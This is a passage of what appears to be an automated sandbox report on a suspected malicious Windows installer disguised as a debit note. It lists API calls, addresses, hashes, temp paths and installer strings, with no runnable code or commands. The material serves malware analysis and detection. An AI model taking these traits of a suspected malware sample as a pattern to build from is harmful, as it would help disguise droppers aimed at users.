                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID: C:\Users\user\brugerlicensaftalerne\Isidora
                                • API String ID: 542301482-431281164
                                • Opcode ID: c3ac8376005eb2128101160bb39d3078d5e8ab7fad74fdd7db3a3b4458e935d7
                                • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                • Opcode Fuzzy Hash: c3ac8376005eb2128101160bb39d3078d5e8ab7fad74fdd7db3a3b4458e935d7
                                • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: c29cc584e89206ddd90cc1717f0c3dadd219838f9a220d036a6385bc3b1c76f5
                                • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                • Opcode Fuzzy Hash: c29cc584e89206ddd90cc1717f0c3dadd219838f9a220d036a6385bc3b1c76f5
                                • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                APIs
                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                • GetSysColor.USER32(?), ref: 00404417
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                • lstrlenW.KERNEL32(?), ref: 00404438
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                • SendMessageW.USER32(00000000), ref: 004044BA
                                • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                • SetCursor.USER32(00000000), ref: 00404539
                                • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                • SetCursor.USER32(00000000), ref: 0040455D
                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                • String ID: Call$N$open
                                • API String ID: 3615053054-2563687911
                                • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                APIs
                                • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                  • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                  • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                • wsprintfA.USER32 ref: 00405CDE
                                • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                  • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 00405BB8
                                  • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                • String ID: %ls=%ls$NUL$[Rename]
                                • API String ID: 1265525490-899692902
                                • Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                • Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                APIs
                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                • BeginPaint.USER32(?,?), ref: 00401047
                                • GetClientRect.USER32(?,?), ref: 0040105B
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                • DeleteObject.GDI32(?), ref: 004010ED
                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                • DeleteObject.GDI32(?), ref: 00401165
                                • EndPaint.USER32(?,?), ref: 0040116E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F
                                • API String ID: 941294808-1304234792
                                • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 0040623F
                                • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                • CharNextW.USER32(?,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406253
                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406266
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 589700163-4178287676
                                • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                APIs
                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: ByteCharFileMultiWideWritelstrlen
                                • String ID: 8$C:\Users\user\AppData\Local\Temp\nsb5059.tmp$C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll
                                • API String ID: 1453599865-377791387
                                • Opcode ID: 6125aa081e30e47da40ee1c37d73e388ad7d86d91ab132d95cfa165a77b7831e
                                • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                • Opcode Fuzzy Hash: 6125aa081e30e47da40ee1c37d73e388ad7d86d91ab132d95cfa165a77b7831e
                                • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                APIs
                                • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                • GetSysColor.USER32(00000000), ref: 0040423A
                                • SetTextColor.GDI32(?,00000000), ref: 00404246
                                • SetBkMode.GDI32(?,?), ref: 00404252
                                • GetSysColor.USER32(?), ref: 00404265
                                • SetBkColor.GDI32(?,?), ref: 00404275
                                • DeleteObject.GDI32(?), ref: 0040428F
                                • CreateBrushIndirect.GDI32(?), ref: 00404299
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                • GlobalFree.KERNEL32(00000000), ref: 00402877
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                • String ID:
                                • API String ID: 3294113728-0
                                • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                APIs
                                • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                • GetTickCount.KERNEL32 ref: 00402D53
                                • wsprintfW.USER32 ref: 00402D81
                                  • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                  • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                  • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                  • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                  • Part of subcall function 00402CFE: MulDiv.KERNEL32(00000000,00000064,0000019F), ref: 00402D13
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                • String ID: ... %d%%
                                • API String ID: 722711167-2449383134
                                • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                • GetMessagePos.USER32 ref: 00404ADF
                                • ScreenToClient.USER32(?,?), ref: 00404AF9
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                • wsprintfW.USER32 ref: 00402CD1
                                • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                • API String ID: 1451636040-1158693248
                                • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                APIs
                                • GlobalFree.KERNEL32(00000000), ref: 10002416
                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
